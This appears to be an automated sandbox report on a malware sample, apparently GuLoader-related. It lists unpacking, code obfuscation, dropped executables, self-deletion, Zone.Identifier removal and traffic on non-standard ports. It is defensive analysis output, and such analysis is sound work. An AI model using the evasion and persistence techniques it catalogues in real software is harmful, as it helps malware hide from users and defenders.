Source: 17.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: 17.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Cryptographic APIs: 'CreateDecryptor'
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\fw8ex1BNek.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: fw8ex1BNek.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: fw8ex1BNek.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: fw8ex1BNek.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: fw8ex1BNek.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: fw8ex1BNek.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: fw8ex1BNek.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: fw8ex1BNek.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: =bC:\xacozon\wujonemapafer\wivasekazifiki\zefixib.pdb source: fw8ex1BNek.exe, acgvitw.5.dr
Source: Binary string: C:\xacozon\wujonemapafer\wivasekazifiki\zefixib.pdb source: fw8ex1BNek.exe, acgvitw.5.dr
Source: Binary string: _.pdb source: 4924.exe, 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.624238934.0000000002440000.00000004.00020000.sdmp
Source: Binary string: 3C:\wiwumife\cogecaviladeho\zirup.pdb source: 4924.exe.5.dr
Source: Binary string: C:\wiwumife\cogecaviladeho\zirup.pdb source: 4924.exe.5.dr

Data Obfuscation:

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\4924.exe Unpacked PE file: 23.2.4924.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Unpacked PE file: 0.2.fw8ex1BNek.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\acgvitw Unpacked PE file: 11.2.acgvitw.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\4924.exe Unpacked PE file: 23.2.4924.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Yara detected GuLoader
Source: Yara match File source: 00000018.00000002.621930773.0000000002860000.00000040.00000001.sdmp, type: MEMORY
.NET source code contains method to dynamically call methods (often used by packers)
Source: DB56.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 17.2.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 17.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 17.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 17.0.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 17.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 18.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 18.0.DB56.exe.aa0000.13.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 18.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 18.2.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 18.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_0042C14A pushad ; retn 0042h 0_2_0042C14D
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_0081F61C push 27BD53DCh; ret 0_2_0081F63C
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_00820A62 push esp; iretd 0_2_00820A6F
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_0081F3A3 push esi; iretd 0_2_0081F3A9
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_008205A7 push edi; ret 0_2_008205A8
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_008205B4 push ebp; retf 0_2_008205B5
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_0081C7BC push ecx; ret 0_2_0081C7BD
Source: C:\Users\user\Desktop\fw8ex1BNek.exe Code function: 0_2_00820351 push es; ret 0_2_00820371
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_0042C14A pushad ; retn 0042h 11_2_0042C14D
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_007EFE41 push es; ret 11_2_007EFE61
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_007EC2AC push ecx; ret 11_2_007EC2AD
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_007F00A4 push ebp; retf 11_2_007F00A5
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_007F0097 push edi; ret 11_2_007F0098
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_007EEE93 push esi; iretd 11_2_007EEE99
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_007F0552 push esp; iretd 11_2_007F055F
Source: C:\Users\user\AppData\Roaming\acgvitw Code function: 11_2_007EF10C push 27BD53DCh; ret 11_2_007EF12C
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_00AA9C81 push 00000028h; retf 0000h 17_2_00AA9C86
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_00AA9E0B push esp; ret 17_2_00AA9E25
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052F0D8C push E86E0343h; retf 17_2_052F0D91
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_052F1868 push ss; iretd 17_2_052F1807
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_0533D4EB push esp; iretd 17_2_0533D4F1
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_0533CF38 pushad ; retf 17_2_0533CF39
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_0533CF78 pushfd ; retf 17_2_0533CF79
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 17_2_0533E0B6 push eax; ret 17_2_0533E0B8
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_00AA9C81 push 00000028h; retf 0000h 18_2_00AA9C86
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_00AA9E0B push esp; ret 18_2_00AA9E25
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_014D3CD3 push esp; iretd 18_2_014D3CD1
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Code function: 18_2_014D3C98 push esp; iretd 18_2_014D3CD1
Source: C:\Users\user\AppData\Local\Temp\4924.exe Code function: 23_2_02995E93 push cs; ret 23_2_02995F04
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_737830C0 push eax; ret 24_2_737830EE
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_028642E1 push edx; iretd 24_2_028642E2
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe Code function: 24_2_73781BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 24_2_73781BFF
Binary contains a suspicious time stamp
Source: DB56.exe.5.dr Static PE information: 0xA6AE113F [Tue Aug 13 00:52:15 2058 UTC]
PE file contains an invalid checksum
Source: 4924.exe.5.dr Static PE information: real checksum: 0x646b4 should be: 0x646d1
Source: DB56.exe.5.dr Static PE information: real checksum: 0x0 should be: 0x939dd
Source: initial sample Static PE information: section name: .text entropy: 7.03736201849
Source: initial sample Static PE information: section name: .text entropy: 7.52699661786
Source: initial sample Static PE information: section name: .text entropy: 7.03736201849
Source: DB56.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: DB56.exe.5.dr, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: DB56.exe.5.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 17.2.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 17.2.DB56.exe.aa0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 17.0.DB56.exe.aa0000.2.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: 17.0.DB56.exe.aa0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 17.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 17.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 17.0.DB56.exe.aa0000.3.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: 17.0.DB56.exe.aa0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 17.0.DB56.exe.aa0000.0.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: 17.0.DB56.exe.aa0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 17.0.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 17.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 17.0.DB56.exe.aa0000.1.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: 17.0.DB56.exe.aa0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 18.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 18.0.DB56.exe.aa0000.1.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: 18.0.DB56.exe.aa0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 18.0.DB56.exe.aa0000.13.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 18.0.DB56.exe.aa0000.13.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: 18.0.DB56.exe.aa0000.13.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 18.0.DB56.exe.aa0000.3.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: 18.0.DB56.exe.aa0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 18.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 18.2.DB56.exe.aa0000.1.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: 18.2.DB56.exe.aa0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 18.2.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 18.0.DB56.exe.aa0000.2.unpack, le10DKSxYqZoK4yLJr/AyTSqq9UUgjbEdt6XX.cs High entropy of concatenated method names: 'Rd6IgZm9bs', 'a51IYwS7qB', 'fBeI84REpS', 'FafICsSQv7', 'SZ6IjsSWEh', 'iNrIatbhGO', 'FUPIwquKEn', '.ctor', '.cctor', 'SGl4od80FeTKDbgKcyo'
Source: 18.0.DB56.exe.aa0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'ANV5TA294a', '.cctor', 'L9DZypn07ERrhnLSqQ', 'RuKO15MYASSpKA6FGS', 't2mfVlgPTmP3xNxXnV', 'KSppPeSffhmlEuO7Sw'
Source: 18.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs High entropy of concatenated method names: '.cctor', 'bKT0ctcUI2', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'

Persistence and Installation Behavior:

barindex
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\acgvitw Jump to dropped file
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8CE5.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\acgvitw Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\DB56.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\4924.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8CE5.exe File created: C:\Users\user\AppData\Local\Temp\nsn7A92.tmp\System.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 7769
Source: unknown Network traffic detected: HTTP traffic on port 7769 -> 49850
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\fw8ex1bnek.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\acgvitw:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
